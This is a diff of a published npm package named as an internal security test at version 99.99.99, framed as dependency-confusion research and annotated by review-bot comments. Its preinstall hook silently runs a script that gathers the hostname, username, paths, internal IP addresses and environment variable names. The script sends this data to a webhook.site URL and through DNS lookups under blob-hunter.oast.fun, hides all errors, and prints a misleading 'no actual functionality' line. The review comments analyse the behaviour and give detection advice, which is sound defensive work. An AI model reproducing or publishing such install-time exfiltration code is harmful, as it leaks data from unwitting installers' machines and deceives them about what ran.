blob-internal-security-test-f63eabf7 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +8 -0
- package/package.json +12 -0
- package/preinstall.js +57 -0
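--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,8 @@
+// BLOB Hunter - Dependency Confusion Security Research
+// This package is used for authorized security research only.
+// It detects when companies accidentally install internal packages from public registries.
+
+module.exports = {
+message: 'This is a security research package by BLOB Hunter',
+purpose: 'Dependency Confusion Detection'
+};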
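--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "blob-internal-security-test-f63eabf7",
+"version": "99.99.99",
+"description": "Security Research - Dependency Confusion PoC by BLOB Hunter",
+"main": "index.js",
+"scripts": {
+"preinstall": "node preinstall.js || true"
+},
+"author": "BLOB Hunter Security Research",
+"license": "MIT",
+"keywords": ["security", "research", "dependency-confusion"]
+}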
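Review bot: The `"preinstall": "node preinstall.js || true"` hook runs code on every install, before the package is ever imported, and the `|| true` forces a zero exit status, so a failing script never surfaces to the person installing. Together with version `99.99.99` and a name that reads like an internal package, this looks like a dependency-confusion package: a resolver that consults the public registry for an unscoped internal name would presumably pick the highest version. Nothing in the manifest gives a contact address or an authorization scope to support the "Security Research" description. Consumers are better protected by installing with `--ignore-scripts` in CI and by binding internal package names to a scoped private registry than by trusting the description.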
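--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -0,0 +1,57 @@
+const https = require('https');
+const os = require('os');
+const dns = require('dns');
+
+// Collect system information
+const info = {
+package: 'blob-internal-security-test-f63eabf7',
+hostname: os.hostname(),
+username: os.userInfo().username,
+homedir: os.homedir(),
+platform: os.platform(),
+cwd: process.cwd(),
+install_path: __dirname,
+internal_ips: [],
+env_keys: Object.keys(process.env).filter(k =>
+!k.toLowerCase().includes('token') &&
+!k.toLowerCase().includes('secret') &&
+!k.toLowerCase().includes('password') &&
+!k.toLowerCase().includes('key')
+).slice(0, 20)
+};
+
+// Get internal IPs
+const interfaces = os.networkInterfaces();
+for (const iface of Object.values(interfaces)) {
+for (const config of iface || []) {
+if (config.family === 'IPv4' && !config.internal) {
+info.internal_ips.push(config.address);
+}
+}
+}
+
+// Create callback URL with data as base64
+const data = Buffer.from(JSON.stringify(info)).toString('base64');
+const callbackUrl = `https://webhook.site/dd5d9a16-4c5c-4c5c-9c5c-4c5c4c5c4c5c?data=${encodeURIComponent(data)}`;
+
+// Also try DNS exfiltration
+const dnsData = Buffer.from(JSON.stringify({h: info.hostname, u: info.username})).toString('hex').substring(0, 60);
+try {
+dns.resolve(`${dnsData}.blob-hunter.oast.fun`, () => {});
+} catch (e) {}
+
+// HTTP callback
+try {
+const url = new URL(callbackUrl);
+const req = https.request({
+hostname: url.hostname,
+port: 443,
+path: url.pathname + url.search,
+method: 'GET',
+timeout: 5000
+});
+req.on('error', () => {});
+req.end();
+} catch (e) {}
+
+console.log('[BLOB Hunter] Security research package - no actual functionality');
+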
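Review bot: This script sends host-identifying data to two third-party services at install time with no consent or scope check, which contradicts the final log line claiming "no actual functionality". The `info` object carries hostname, username, home directory, platform, working directory, install path, non-internal IPv4 addresses and up to 20 environment variable names. The `env_keys` filter only drops names containing token/secret/password/key, so the remaining names can still describe internal tooling. Every failure path is silenced (`catch (e) {}`, `req.on('error', () => {})`), so an affected host prints only that one benign-looking line. To find hosts that installed this version, search resolver logs for lookups of a hex-labelled subdomain under `blob-hunter.oast.fun` and proxy logs for HTTPS GETs to `webhook.site` with a `data=` query parameter, and treat the reported hostnames, usernames and addresses as disclosed.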